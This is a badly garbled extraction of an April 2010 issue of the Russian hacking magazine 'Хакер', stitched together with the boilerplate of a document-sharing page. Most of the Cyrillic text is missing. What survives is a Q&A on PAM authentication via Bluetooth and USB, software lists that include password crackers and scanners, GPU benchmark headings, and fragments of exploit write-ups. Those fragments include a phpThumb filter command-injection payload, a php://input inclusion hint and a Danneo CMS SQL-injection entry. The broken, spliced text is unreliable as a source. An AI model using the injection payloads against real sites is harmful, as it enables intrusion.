Q: Linux'
,
Bluetooth, (
) ?
A: PAM (Pluggable
Authentication Modules),
API-
. : ,

Bluetooth (
),
pam_blue (packages.gentoo.org/
package/sys-auth/pam_blue).
:
pam_usb (pamusb.org)
USB-;
pam_fprint (reactivated.net/fprint/wiki/Pam_
fprint) ;
pam-face-authentication (code.google.
com/p/pam-face-authentication) -.

,

. z
X 04 /135/ 10
>Net
Ad Muncher 4.81
Angry IP Scanner 3.0 Beta 4
ApexDC++ 1.3.0
CrossLoop 2.71
DNSBench
Halite 0.3.2.2
>Multimedia
Bullzip PDF Printer 7.1
Hornil StylePix 1.3.0
IOGraph 0.9
MediaInfo 0.7.28
Nuance PDF Reader 6
Picasa for Windows 3.6.0
ProgDVB v6.32.7
Screensaver Player 3.0
Sqirlz Morph 2.1
STDU Viewer 1.5.382
UVScreenCamera v4.4 beta
VSO Image Resizer 3.0
webcamXP 5 5.5
>Misc
Acer Gridvista 2.72.317
AM-DeadLink 4.0
BossMode 1.0
EverNote 3.5.2
File Association Fixer 1.0
Flexcrypt 3.3.0
Freeraser
LockHunter 1.0 Beta 3
Microsoft Keyboard Layout Creator 1.4
Mozilla Prism for Windows 1.0 Beta 3
MyEventViewer 1.25
MyPhoneExplorer 1.7.5
PeaZip 3.0
Polyglot 3000 3.44
Prio - Priority Saver 1.99
ProcessQuickLink
QTTabBar 1.2.3b5
RegScanner 1.80
TranslateIt! 8.0
WinDirStat 1.1.2
Windows Access Panel for Windows
7 & Vista
>>WINDOWS
>>Development
CollabNet Subversion 1.6.9
Database .NET 3.1.3712
Dependency Walker 2.2
EmEditor Professional 9.15
HiAsm 4.3
IncrediBuild 3.50
PatchFactory 3.3
Selenium 1.0.5
SQLiteStudio 1.1.3
SQLyog Community Edition 8.22
Syser Kernel Debugger 1.99.1900
Titanium Developer
VisualSVN 1.7.7
VisualSVN Server 2.1.1
WinHex 15.6
wyBuild 2.5
>>UNIX
>Desktop
Amarok 2.2.2
Anki 0.9.9.8.6
BashStyle-NG 7.9.1
BRL-CAD 7.16.4
Darktable 0.4
DeaDBeeF 0.3.2
DeVeDe 3.15.2
DjVuSmooth 0.2.2
Double Commander 0.4.5
Epidermis 0.5
gCAD3D 1.42
GRAMPS 3.1.3
Midnight Commander 4.7.0.2
NtEd 1.9.16
>System
Allmyapps
AnVir Task Manager
Bonkey for Windows
CPU-Z 1.53.5 Beta
Default Programs Editor 2.6
Defraggler 1.17
Driver Sweeper 2.1.0
DriverMax 5.5
Gizmo Central 2.7.7
HDDScan 3.2
Index Your Files 5.0
Ketarin 1.1.0
MONyog MySQL Monitor and Advisor
3.7.2
MySQL Community Server 5.1.44
Outpost Firewall Pro 2009
Panda Cloud Antivirus Free Edition
1.0.1
PostgreSQL 8.4.2
Quicksys RegDefrag 2.8
SIW 2010 (build 0210)
SUMo 2.7.5.86
>Security
BSQLHackerSetup 0909
DECAF 2.01
Heyoka 0.1.3
Imposter 0.9
John the Ripper 1.7.5
keimpx 0.2
LookInMyPC 2.0
Nessus 4.2.1
PenTBox 1.3.1
Sahi V3
Watcher 1.3.0
WebRaider 0.2.3.8
Websecurify 0.5RC1
WinFail2ban 0.1
MailBrowser 1.76
Opera 10.50
Seesmic for Windows 0.6
Skype 4.2
uTorrent 2.0
VisualRoute 2010 for Windows 14.0b
Wi-Fi Inspector 1.0.1
Wireshark for Windows 1.3.3
>Security
Browser Fuzzer 3
Burp Suite 1.3
FingerPrintFucker
GreenSQL 1.2.2
Groundspeed 1.1
Honeyd 1.5c
>Net
BitchX 1.1
Bitflu 0.97
EZ Intranet Messenger 1.2.4
FileZilla Client 3.3.2
gnetworktester 0.11
gWakeOnLan 0.5
I2P 0.7.11
Ipaudit 0.95
Midori 0.2.3
Mozilla Firefox 3.0.18
Nagstamon 0.9.2
Opera 10.10
Pidgin 2.6.6
Pino 0.2.0
SABnzbd 0.5.0
SeaMonkey 2.0.3
Sylpheed 3.0
Synchrorep 1.4.1
ZNC 0.080
>Games
Freeciv 2.2.0
>Devel
Ald 0.1.7
Autoconf Macro Archive
Code Browser 3.16
CodeInvestigator 0.22.1
crpcut 1.0.2
DreamPie 1.0
FireQuery 0.6
Git 1.7.0
itools 0.60.8
MoSync 2.3
Opera Dragonfly Alpha
Oracle Enterprise Pack for Eclipse
11g 11.1.1.4
ParseIRC 1.16
Picket 0.2.1
Rhodes 1.4
Seed7
Simple Sockets 1.4.0
SVN Access Manager 0.4.1.6
Trad4 3.1
UMLet 10.4
OpenOffice.org 3.2
OpenShot 1.0
QGIS 1.4
QPxtool 0.7.0
Rakarrack 0.4.2
Scilab 5.2.1
Sweet Home 3D 2.2
Thunar 1.1.0
Tomboy 1.0.1
zNotes 0.4.0
>X-distr
PC-BSD 8.0
>System
2click Update 5.0
AMD Catalyst 10.2
Deja Dup 13.91
Dstat 0.7.1
Gujin 2.8
Linux kernel 2.6.33
LTSP 5.2
Monit 5.1.1
nVidia 190.53
QEMU 0.12.3
Sudo 1.7.2p3
Syslinux 3.85
uBackup 4.95
Util-linux 2.17.1
VirtualBox 3.1.4
Wine 1.1.39
>Server
Apache 2.2.14
Asterisk 1.6.2
BIND 9.7.0
Cherokee 0.99.43
Clapf 0.4.4
CUPS 1.4.2
DHCP 4.1.1
HylaFax 5.4.1
IMSpector 0.9
KDE Personal WebServer 0.1
MoSSHe 10.2.22
MySQL 5.1.44
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.7.0
ProFTPD 1.3.3
Samba 3.4.6
Sendmail 8.14.4
Squid 3.0.STABLE24
Httptunnel 3.0.5
iScanner 0.1
John the Ripper 1.7.5
Medusa 2.0
Netsniff-ng 0.5.4.2
Nikto 2.1.1
OpenDNSSEC 1.0.0
Portsentry 1.2
Privoxy 3.0.16
Snort 2.8.5.3
SquidClamAv 5.1
Suricata 0.8.1
UnHash 1.1
Zebedee 2.4.1
04(135) 2010
. 58
ACTIVEX
. 44
. 68

HARDWARE-DEP
DEP
04 (135) 2010
. 90
LINUX ?
. 96
.NET REMOTING:

GRID-

: 2
10
.
SHAREWARE- SYMBIAN . 102
UNITS
HTTP:// WWW2
torrent-

TORRENT2EXE
www.torrent2exe.com
, ? ,
, , ,
. , , BitTorrent-,
, ?
,
www.torrent2exe.com .torrent-,
. ,
BitTorrent-.
PASTIE
www.pastie.org
- , - ,
XML-, ,
, Pastie . , -
(, C++ Python). , ,
.
,
.
- .

-
Python
UTILITY MILL
www.utilitymill.com
IZZYMENU
-? , -
. , Utility Mill, . , Python,
,
. , ,
.
, .
API .
, , - CSS
. IzzyMenu
,
, -
, ,
. IzzyMenu :
][ .
144
www.izzymenu.com
X 04 /135/ 10

Хакер 2010 04 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Хакер 2010 04 PDF

Uploaded by

Copyright:

Available Formats

x 04 () 2010

SHAREWARE- SYMBIAN . 102

Visual Studio 2010

Visual Studio 2010

/ .: (495) 935-7034, : (495) 780-8824

THE PIRATE BAY

STRATEGY ANALYTICS , 2016

The Pirate Bay , Flattr . ,

Black Hawk Safety Net

BATMAN: ARKHAM ASYLUM, FPS

Palit GeForce GT 240 Sonic

NVIDIA GeForce GT 220. ,

RESIDENT EVIL 5, FPS

Palit GeForce GT 240 Sonic

Palit GeForce GT 240 Sonic

Palit GeForce GT 220 Sonic

Palit GeForce GT 220 Sonic

Palit GeForce GT 220

Palit GeForce GT 220

Sapphire Radeon HD 5750

Sapphire Radeon HD 5750

Sapphire Radeon HD 4670

Sapphire Radeon HD 4670

Sapphire Radeon HD 4650

Sapphire Radeon HD 4650

- Batman: Arkham, Asylum, FPS/..

RED FACTION: GUERRILLA, FPS

Palit GeForce GT 240 Sonic

Palit GeForce GT 240 Sonic

Palit GeForce GT 220 Sonic

Palit GeForce GT 220 Sonic

Palit GeForce GT 220

Palit GeForce GT 220

Sapphire Radeon HD 5750

Sapphire Radeon HD 5750

Sapphire Radeon HD 4670

Sapphire Radeon HD 4670

Sapphire Radeon HD 4650

Sapphire Radeon HD 4650

ajax() jQuery API-

VISUAL STUDIO 97 . MICROSOFT ,

Windows Presentation Foundation (WPF).

Visual Studio 2010

Visual Studio 2010

reg add HKLM\Software\Microsoft\Windows\

, "", /**/, + %20

./build-key-pkcs12 client ( X.509 )

page php://input: http://www.

echo 1 > /proc/sys/net/ipv4/ip_forward

9. vpn/sample-scripts openvpn.init - ( , init) /etc/init.d/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;

$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

find . -perm -2 -type -d -ls

while(!feof($socket)) echo fgets($socket, 1024);

BRIEF phpThumb (phpthumb.sourceforge.net/)

foreach ($AllowedExecFunctions as $execfunction => $is_

foreach ($this->fltr as $filterkey => $filtercommand) {

$this->DebugMessage('ImageMagick failed with message

jpg&fltr[]=blur|5 -quality 75 -interlace line /

TARGETS phpThumb <= 1.7.9

DANNEO CMS <= 0.5.2 SQL INJECTION

BRIEF CMS Danneo ,

INSERT INTO dn052_polling_comment VALUES (NULL,'1','0',